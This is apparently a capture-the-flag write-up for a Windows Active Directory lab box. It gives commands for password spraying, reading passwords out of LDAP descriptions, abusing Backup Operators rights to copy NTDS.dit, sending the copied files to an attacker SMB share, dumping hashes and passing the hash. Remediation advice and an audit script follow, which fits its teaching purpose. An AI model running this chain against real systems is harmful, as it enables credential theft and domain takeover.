Summary
Cicada is an Easy Windows AD box that demonstrates the danger of hardcoded credentials and default passwords in shared network resources. The foothold begins with anonymous/guest SMB access to an HR share, revealing a default new-employee password. Password spraying this default credential against enumerated users identifies a valid account (michael.wrightson). Using Michael’s access to query LDAP, we discover another user’s (david.orelious) password stored in their account description field.
David has read access to a DEV share containing a PowerShell backup script with hardcoded credentials for a third user, emily.oscars. Emily is a member of the Backup Operators group, granting her SeBackupPrivilege. This privilege allows us to bypass file permissions, enabling the use of diskshadow and robocopy to extract the NTDS.dit database and the SYSTEM registry hive. Finally, we extract the Administrator’s NTLM hash locally and use it to Pass-the-Hash for full domain compromise.
Recon
Initial enumeration reveals a standard Windows Domain Controller profile with SMB guest access enabled.
Foothold — HR default + LDAP description
We start by enumerating SMB shares as a guest user. We find an HR share that contains a file named Notice from HR.txt. This file explicitly states the default password given to new employees.
smbclient //<DC>/HR -U guest%
get 'Notice from HR.txt'
# password: <redacted>
We can then use a tool like netexec to brute-force a list of RIDs and identify valid domain users. Spraying the default password against these users reveals that michael.wrightson has not changed his password.
netexec smb <DC> -u guest -p '' --rid-brute 5000
# Found multiple users
netexec smb <DC> -u users.txt -p '<redacted>' --no-bruteforce
# michael.wrightson VALID
With a valid domain account, we can query LDAP for more information. Checking the description attribute of all users is a common technique, as administrators sometimes temporarily store passwords or notes there. Querying as Michael reveals David’s password.
ldapsearch -x -H ldap://<DC> -D '[email protected]' \
-w '<pw>' -b 'DC=cicada,DC=htb' '(objectClass=user)' description \
| grep -A1 david
# description: <redacted>
Testing David’s credentials reveals he has read access to the DEV share. Inside, we find a script named Backup_script.ps1 which contains hardcoded PowerShell credentials for emily.oscars.
smbclient //<DC>/DEV -U david.orelious%'<pw>'
get Backup_script.ps1
# Script contains hardcoded credentials for emily.oscars
We can now authenticate to the server via WinRM using Emily’s credentials.
evil-winrm -i <DC> -u emily.oscars -p '<pw>'
Privesc — Backup Operators → NTDS
Checking Emily’s privileges reveals she is a member of the Backup Operators group, granting her SeBackupPrivilege and SeRestorePrivilege. These privileges are designed to allow backup software to read any file on the system, regardless of its ACL.
PS> whoami /priv | findstr -i Backup
SeBackupPrivilege Enabled
SeRestorePrivilege Enabled
We can abuse this by using diskshadow.exe to create a shadow copy of the C: drive. This is necessary because the Active Directory database (NTDS.dit) is constantly locked by the system. We write a short script for diskshadow to automate the shadow copy creation and expose it as the Z: drive.
PS> New-Item -ItemType Directory -Force -Path C:\Temp | Out-Null
PS> $commands = "set context persistent nowriters", "add volume C: alias bbb", "create", "expose %bbb% Z:", "exit"
PS> $commands | Out-File C:\Temp\ds.txt -Encoding ascii
PS> diskshadow.exe /s C:\Temp\ds.txt
Once exposed, we use robocopy with the /b flag (backup mode) to copy the NTDS.dit file out of the shadow copy, bypassing file locks and permissions. We also save the SYSTEM registry hive, which contains the boot key needed to decrypt the database.
PS> robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit
PS> reg save HKLM\SYSTEM C:\Temp\system
To exfiltrate these files, setting up an SMB server on the attacking machine and copying them over the network is often more reliable than attempting to download large files directly through WinRM.
# On attacking machine
impacket-smbserver share $(pwd) -smb2support
# On target via WinRM
PS> Copy-Item -Path C:\Temp\ntds.dit -Destination \\<attacker-ip>\share\ntds.dit -Force
PS> Copy-Item -Path C:\Temp\system -Destination \\<attacker-ip>\share\system -Force
Finally, we parse the dumped database locally using impacket-secretsdump to extract the NTLM hashes of all domain users, including the Administrator.
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# Extracts Administrator NT hash
We can then use Pass-the-Hash with WinRM to authenticate as the Administrator and retrieve the root flag.
netexec winrm <DC> -u Administrator -H <hash> -x 'type C:\Users\Administrator\Desktop\root.txt'
Why each step worked
- HR notice + default password: Storing default passwords in universally readable shares without enforcing a password change at next logon is a critical operational failure.
- LDAP description as a notepad: The LDAP description field is readable by any authenticated domain user. Using it to store sensitive information like passwords directly exposes that information to the entire domain.
- Hardcoded PS creds: Embedding credentials directly within scripts (even if obfuscated or cast to a SecureString from plaintext) makes them trivially recoverable if the script is readable by unauthorized users.
- SeBackupPrivilege: This privilege intentionally bypasses file read ACLs. When granted to an account, it effectively provides a path to domain dominance because it allows copying the NTDS.dit file.
Counterfactuals
- Secure Default Passwords: Enforce the “User must change password at next logon” setting for all new accounts. Do not post default passwords in open shares.
- Protect LDAP Attributes: Regularly audit LDAP attributes (like description or info) for sensitive data and remove it.
- Credential Management: Use secure credential vaults or Group Managed Service Accounts (gMSAs) instead of hardcoding credentials in scripts.
- Restrict Privileged Groups: Severely restrict membership in groups like Backup Operators. Ensure accounts in these groups cannot log on interactively or via WinRM if not strictly necessary.
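As an added example (not part of the original writeup), the following PowerShell audit checks the three directory-side controls above in one pass: free-text attributes holding secrets, new accounts still on their onboarding password, and Backup Operators membership. It assumes the RSAT ActiveDirectory module is installed and that the keyword pattern and 30-day window are my own choices.

```powershell
# Added audit example; assumes RSAT ActiveDirectory module and read rights on the domain.
Import-Module ActiveDirectory

# 1. Secrets parked in LDAP free-text attributes (the david.orelious pattern).
#    Any authenticated user can read these, so treat every hit as already disclosed.
$pattern = 'pass|pwd|cred|secret'   # assumed keyword list, extend as needed
$leakyAttributes = Get-ADUser -Filter * -Properties Description, Info |
    Where-Object { ($_.Description -match $pattern) -or ($_.Info -match $pattern) } |
    Select-Object SamAccountName, Description, Info

Write-Host "== Users with secret-like text in description/info =="
$leakyAttributes | Format-Table -AutoSize

# 2. Recently created, enabled accounts whose password was never changed after creation.
#    pwdLastSet = 0 means "must change at next logon" is set; otherwise compare the
#    password timestamp with whenCreated to spot accounts still on the onboarding password.
$recent = Get-ADUser -Filter { Enabled -eq $true } -Properties pwdLastSet, whenCreated |
    Where-Object { $_.whenCreated -gt (Get-Date).AddDays(-30) -and $_.pwdLastSet -ne 0 } |
    Where-Object {
        $pwdSet = [DateTime]::FromFileTime($_.pwdLastSet)
        ($pwdSet - $_.whenCreated).TotalMinutes -lt 5
    }

Write-Host "== New accounts still on their initial password =="
$recent | Select-Object SamAccountName, whenCreated | Format-Table -AutoSize

# Remediation for the HR-default problem: force a change on first logon.
# Remove -WhatIf once the list has been reviewed.
$recent | ForEach-Object { Set-ADUser -Identity $_ -ChangePasswordAtLogon $true -WhatIf }

# 3. Backup Operators: every member here can read NTDS.dit regardless of ACLs,
#    so the list should be short and every entry justified.
Write-Host "== Backup Operators (recursive) =="
Get-ADGroupMember -Identity 'Backup Operators' -Recursive |
    Select-Object name, objectClass, distinguishedName | Format-Table -AutoSize
```

Run it from a domain-joined admin host on a schedule and diff the output; a new Backup Operators member or a fresh description hit is the signal to act on before someone else finds it via ldapsearch.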
Source attribution
I have personally engaged with and rooted this box. The methodologies used align with standard Active Directory enumeration and exploitation techniques.